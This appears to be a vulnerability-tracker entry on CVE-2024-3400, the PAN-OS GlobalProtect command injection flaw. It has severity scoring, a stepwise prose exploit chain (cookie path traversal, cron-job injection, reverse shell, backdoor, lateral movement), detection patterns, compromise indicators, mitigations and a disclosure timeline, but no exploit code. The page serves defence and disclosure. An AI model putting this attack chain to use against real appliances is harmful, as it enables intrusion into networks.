TP-EXP-2024-0001 CVE-2024-3400 critical Patched Certified

Palo Alto PAN-OS GlobalProtect Command Injection (CVE-2024-3400)

CVE CVE-2024-3400 Platform Palo Alto Networks PAN-OS 10.2, 11.0, 11.1 Type Command Injection
Severity CRITICAL
Status Patched
Zero-Day Confirmed
Disclosed April 12, 2024
Patched April 14, 2024
Days in the Wild 26
Researcher Volexity CISA KEV Listed

Severity Assessment

  • Exploitability: 10/10 — Unauthenticated, remotely exploitable with no user interaction required
  • Impact: 10/10 — Full root-level command execution on the firewall appliance
  • Weaponization Risk: Critical — Active exploitation in the wild prior to disclosure; proof-of-concept exploits widely available
  • Patch Urgency: Critical — CISA added to KEV catalog with BOD 22-01 remediation deadline
  • Detection Coverage: Medium — Volexity provided IOCs and detection guidance; behavioral detection requires careful log analysis

CVSS 3.1 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Executive Summary

CVE-2024-3400 is a critical command injection vulnerability in the GlobalProtect gateway feature of Palo Alto Networks PAN-OS firewall operating system. The vulnerability allows an unauthenticated remote attacker to execute arbitrary commands with root privileges on the firewall appliance. It affects PAN-OS versions 10.2, 11.0, and 11.1 when both GlobalProtect gateway and device telemetry are enabled.

The vulnerability was discovered by Volexity while investigating suspicious network activity at a customer site in early April 2024. Analysis revealed a state-sponsored threat actor (tracked as UTA0218) had been exploiting the vulnerability as a zero-day since at least March 17, 2024 — approximately 26 days before public disclosure. Palo Alto Networks released emergency patches within 48 hours of disclosure, and CISA immediately added the CVE to the Known Exploited Vulnerabilities (KEV) catalog.

Exploit Chain

The attacker sends a crafted HTTP request to the GlobalProtect gateway endpoint with a specially constructed SESSID cookie value. The cookie value exploits a path traversal vulnerability in how PAN-OS processes session identifiers, allowing the attacker to write arbitrary data to a controlled file path on the filesystem.

Stage 2: Command Injection via Telemetry Cron Job

PAN-OS’s device telemetry feature includes a scheduled cron job that processes files in specific directories. By writing a crafted payload to a path that the telemetry cron job reads, the attacker achieves command injection. The cron job executes the attacker-controlled content with root privileges.

Stage 3: Reverse Shell and Persistence

In observed exploitation, UTA0218 used the command injection to establish a reverse shell, then deployed a Python-based backdoor called UPSTYLE. The backdoor provided persistent remote access and was configured to listen for commands embedded in specially crafted HTTP requests to the firewall’s web interface.

Stage 4: Lateral Movement into Internal Network

From the compromised firewall — which sits at the network perimeter — the attacker pivoted into the victim’s internal network. Observed activities included credential harvesting from Active Directory, exfiltration of sensitive data, and deployment of additional tools on internal systems.

Detection Guidance

Log-based detection:

  • Monitor GlobalProtect gateway logs for HTTP requests containing anomalous SESSID cookie values, particularly those with path traversal sequences (../)
  • Check PAN-OS system logs for unexpected cron job executions or modifications
  • Review filesystem integrity for unexpected files in telemetry-related directories

Network-based detection:

  • Alert on outbound connections from PAN-OS management interfaces to unknown external IPs
  • Monitor for reverse shell traffic originating from firewall appliances
  • Inspect HTTP traffic to GlobalProtect endpoints for oversized or malformed cookie headers

Behavioral indicators:

  • Unexpected Python processes running on PAN-OS appliances
  • Configuration export or credential access commands executed outside maintenance windows
  • New or modified files in /opt/panlogs/tmp/device_telemetry/ directories

Indicators of Compromise

Network Indicators

  • Outbound connections from PAN-OS appliances to attacker C2 infrastructure
  • HTTP requests to GlobalProtect with SESSID cookies containing ../ path traversal sequences
  • POST requests to the firewall’s web management interface containing encoded commands

File Indicators

  • UPSTYLE backdoor Python script on PAN-OS filesystem
  • Unexpected files in /opt/panlogs/tmp/device_telemetry/hour/atp/
  • Modified cron job configurations in PAN-OS system directories

Host Indicators

  • Unexpected Python processes with network listeners on PAN-OS
  • Creation of /var/log/pan/sslvpn_ngx_error.log with embedded command output
  • Running configuration exports initiated outside normal change windows

Pre-Patch Mitigations

Palo Alto Networks provided the following mitigations prior to patch availability:

  • Disable device telemetry: If GlobalProtect gateway cannot be disabled, disabling telemetry removes the cron job that enables command execution (breaks the exploit chain at Stage 2)
  • Apply Threat Prevention signature: Palo Alto released Threat Prevention signature (Threat ID 95187) that blocks exploitation attempts at the network level
  • Restrict GlobalProtect access: Limit GlobalProtect gateway access to known IP ranges where possible

Post-patch requirements:

  • Update to PAN-OS 10.2.9-h1, 11.0.4-h1, or 11.1.2-h3 (or later)
  • After patching, perform a thorough compromise assessment — patching alone does not remove existing backdoors
  • Reset all credentials accessible from the firewall appliance
  • Review firewall configurations for unauthorized changes

Disclosure Timeline

2024-03-17 — Earliest Known Exploitation

Retrospective analysis by Volexity identified exploitation activity dating back to at least March 17, 2024, approximately 26 days before public disclosure.

2024-04-10 — Volexity Discovers Exploitation

Volexity researchers detected suspicious activity on a customer’s Palo Alto Networks firewall during an incident response engagement and began analysis.

2024-04-12 — Public Disclosure and Advisory

Palo Alto Networks published Security Advisory PAN-SA-2024-0015 confirming the vulnerability and active exploitation. CISA added CVE-2024-3400 to the Known Exploited Vulnerabilities catalog and issued Emergency Directive ED-24-02.

2024-04-14 — Emergency Patches Released

Palo Alto Networks released hotfix patches for affected PAN-OS versions: 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3.

2024-04-15 — Proof-of-Concept Exploits Published

Multiple proof-of-concept exploits were published publicly, increasing the risk of mass exploitation. Scanning activity for vulnerable GlobalProtect instances surged.

2024-04-17 — CISA BOD 22-01 Deadline

Federal civilian agencies required to apply patches or mitigations per CISA’s Binding Operational Directive 22-01 remediation timeline.

Sources & References

  1. Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) — Volexity, 2024-04-12
  2. CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway — Palo Alto Networks, 2024-04-12
  3. CISA Adds CVE-2024-3400 to Known Exploited Vulnerabilities Catalog — CISA, 2024-04-12
  4. Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 — Palo Alto Unit 42, 2024-04-12
  5. NVD - CVE-2024-3400 — NIST NVD, 2024-04-12
zero-dayfirewallpalo-altocve-2024-3400command-injectioncisa-kevstate-sponsoreduta0218